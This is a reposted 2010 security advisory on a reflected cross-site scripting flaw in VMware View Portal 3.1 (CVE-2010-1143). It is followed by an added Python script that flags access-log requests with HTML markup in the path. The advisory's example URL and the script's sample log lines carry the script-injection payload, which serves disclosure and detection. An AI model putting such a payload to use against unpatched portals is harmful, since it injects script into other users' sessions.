Source: packetstorm | Author: Alexey Sintsov | ID: PACKETSTORM:89559
Published: May 14, 2010 - 12:00 a.m.

VMware Portal 3.1 Cross Site Scripting


EPSS: 0.006 (Low), percentile 76.1%

`  
  
[DSECRG-09-058] VMware View - XSS vulnerability  
  
Linked XSS in VMware Portal  
  
Digital Security Research Group [DSecRG] Advisory DSECRG-09-058  
  
Application: VMware View Portal  
Versions Affected: <= 3.1  
Vendor URL: http://www.vmware.com  
Bugs: XSS  
Exploits: YES  
Reported: 07.09.2009  
Vendor response: 21.09.2009  
Date of Public Advisory: 05.05.2010  
CVE: CVE-2010-1143  
Author: Alexey Sintsov  
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)  
  
  
Description  
***********  
  
Linked XSS in VMware Portal  
  
  
Details  
*******  
  
An attacker may inject JavaScript code into the URL.  
  
Example:  
********  
  
https://[VMware_Portal_IP]/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>  
  
Solution  
********  
Update VMware View to version 3.1.3  
  
References  
**********  
http://dsecrg.com/pages/vul/show.php?id=149  
http://lists.vmware.com/pipermail/security-announce/2010/000092.html  
  
  
About  
*****  
  
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsecrg [dot] com  
http://www.dsecrg.com   
  
`
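
For defenders reviewing traffic to a portal that has not yet been updated, the following added example (not part of the DSecRG advisory or any VMware code) flags access-log entries whose request path contains HTML markup after percent-decoding, which is the pattern shown in the advisory's example URL. It assumes Combined Log Format lines, for instance from a reverse proxy in front of the portal; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*) (HTTP/[\d.]+)" (\d{3}) ')
# An opening or closing HTML tag has no legitimate place in a URL path.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_path_markup(lines):
    """Return (client, status, decoded_path) for requests whose path carries markup."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, _method, target, _proto, status = m.groups()
        path = fully_decode(target.split("?", 1)[0])  # path only, query dropped
        if MARKUP_RE.search(path):
            hits.append((client, int(status), path))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [14/May/2010:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/May/2010:10:00:05 +0000] "GET /not_a_real_page%3CSCRIPT%3Ealert(/XSS/.source)%3C/SCRIPT%3E HTTP/1.1" 404 312',
    '192.0.2.12 - - [14/May/2010:10:00:09 +0000] "GET /missing%253Cscript%253E HTTP/1.1" 404 298',
    '192.0.2.13 - - [14/May/2010:10:00:12 +0000] "GET /docs/a%20b.pdf HTTP/1.1" 404 290',
]

if __name__ == "__main__":
    for client, status, path in find_path_markup(SAMPLE):
        print(f"{client} {status} {path}")
```

A hit only shows that such a request was made; whether the response reflected the markup depends on the portal version, so the fix remains the update named under Solution.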